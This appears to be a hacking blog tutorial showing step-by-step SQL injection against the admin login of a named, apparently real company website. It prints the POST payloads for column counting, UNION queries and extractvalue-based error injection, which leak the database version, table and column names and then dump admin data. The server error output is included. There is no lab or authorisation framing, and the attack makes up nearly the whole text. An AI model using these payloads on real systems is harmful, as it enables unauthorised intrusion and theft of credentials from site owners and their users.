But some Times when we Found SQL injection Vulnerability In Login Panel And after Executing SQL Queries There, it doesn't Give Access To the login Panel.So in SUCH cases we Will Inject The Login Panel With XPATH injection and dump admin Details from Login Panel.
So we Will Start our Manually SQL Injection.as we are injecting through POST Parameters so we need LIVE HTTP HEADERS Addon for Executing Post Parameters In Login Panel.
Here is The Target site:
http://www.almoayedgroup.com/admin
Now open LIVE HTTP HEADERS in Mozilla Firefox .As You Can See there are username and password Boxes in Admin Login Panel.Insert Some Text there and Click On Log In Button.
After Clicking On the Log In Button, Now search the Post Parameters in Live HTTP HEADERS.Here are our Post Request that we have sent to the server.
From The Above Picture You Can See these are our Post Request Parameters
POST REQUEST:user_id=raijee&password=12345&submit=Sign+In
Now let's Add Single Quote ' after user_id=raijee' to check if the Login Panel is Vulnerable to SQL Injection.After Adding The Single Quote ' in Our Query Let's Send A POST Request to The Server And Click on REPLY Button.
So After sending the POST Request to The Server it gives SQL Error !!
So this one is Our POST Parameter Now Add Order By Command For Counting columns:
POST REQUEST:user_id=raijee' order by 2%23&password=12345&submit=Sign+In
it Gives No any Error !!
POST REQUEST:user_id=raijee' order by 5%23&password=12345&submit=Sign+In
Again No Error !!
POST REQUEST:user_id=raijee' order by 6%23&password=12345&submit=Sign+In
Here we Got Error !!
Error:Invalid query:Unknown column '6' in 'order clause'
so it mean there are 5 Total Columns. Now Let's Prepare our UNION BASED command and Send a POST Request to the Server:
POST REQUEST:user_id=raijee' and 0 union select 1,2,3,4,5%23&password=12345&submit=Sign+In
But It doesn't Give us Any Output There.So now Let's Try XPATH Injection for injecting it.
So This is our XPATH query for version.You Can use XPATH with Extractvalue or UpdateXML.
Let's Send a Post Request for getting the VERSION With XPATH Injection by Extractvalue .
POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,version()))%23&password=12345&submit=Sign+In
Here we Got The VERSION.
Invalid query:XPATH syntax error: ':5.5.32-log'
So now next we Have To Get the Tables from the Database.Here is The Query for Tables and Send a Post Request.
POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))%23&password=12345&submit=Sign+In
Increase the LIMIT for other Tables.After Getting the Tables Next part is to Getting the columns from The Tables.So This one is our Query:
POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name='TABLE_NAME_HERE' limit 0,1)))%23&password=12345&submit=Sign+In
After Getting The Columns From the Tables Now Final Part is Dump Data from the Columns.
So This one is FINAL QUERY:
POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(COLUMN_NAME_HERE) from TABLE_NAME_HERE)))%23&password=12345&submit=Sign+In
If you have not Read Tutorials About XPATH Injection then First Go And Read
XPATH Injection Using Extractvalue
XPATH Injection Using UpdateXML
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee
Good one
ReplyDeletethnks .
Delete